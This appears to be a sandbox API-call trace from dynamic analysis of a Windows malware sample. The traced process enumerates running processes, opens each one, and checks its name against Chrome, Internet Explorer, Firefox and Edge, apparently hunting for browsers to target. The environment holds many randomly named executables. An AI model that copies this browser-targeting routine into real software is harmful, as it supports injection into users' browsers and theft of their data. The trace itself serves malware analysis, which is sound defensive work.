	[0256.213] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xb210
	[0256.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.214] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.214] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.215] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.216] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xb214
	[0256.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.217] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.217] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.217] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.218] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0256.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb218
	[0256.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.219] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0256.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.219] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.220] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0256.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.220] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xb21c
	[0256.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.221] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.221] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.222] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.222] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0256.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xb220
	[0256.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.223] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.223] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.224] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.224] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.224] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.225] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xb224
	[0256.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.225] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0256.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.225] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.226] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0256.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.226] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.226] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xb228
	[0256.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.227] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.227] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.228] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.228] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.228] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.229] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xb22c
	[0256.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.229] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0256.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.230] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.230] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0256.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.230] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.231] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0256.232] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xb230
	[0256.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.232] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0256.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.232] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.232] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0256.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.233] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.233] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0256.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xb234
	[0256.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.234] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0256.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.234] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.234] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0256.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.235] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.235] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0256.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xb238
	[0256.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.236] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0256.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.236] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.236] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0256.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.237] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0256.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0256.238] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0256.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xb23c
	[0256.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.238] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0256.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.239] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.240] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0256.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.240] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0256.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xb240
	[0256.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.242] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0256.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.242] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.242] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0256.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.243] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0256.243] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xb244
	[0256.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.244] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0256.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.244] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.244] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0256.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.245] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.245] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0256.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xb248
	[0256.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.246] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0256.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.246] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.247] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0256.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.247] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.247] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0256.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xb24c
	[0256.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.248] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0256.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.249] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.249] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0256.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.250] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.250] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0256.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xb250
	[0256.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.251] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0256.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.251] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.252] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0256.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.252] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.252] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0256.253] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xb254
	[0256.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.253] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0256.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.253] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.254] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0256.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.254] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.255] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0256.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xb258
	[0256.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.255] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0256.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.256] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.256] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0256.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.257] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.257] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0256.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xb25c
	[0256.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.258] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0256.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.258] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.259] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0256.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.259] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.259] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0256.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xb260
	[0256.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.260] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0256.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.260] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.260] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0256.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.261] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.261] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0256.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xb264
	[0256.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.262] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0256.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.263] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.263] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0256.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.264] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.265] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0256.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xb268
	[0256.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.265] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0256.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.266] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.267] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0256.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.267] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0256.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xb26c
	[0256.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.269] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0256.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.269] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.270] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0256.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.270] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
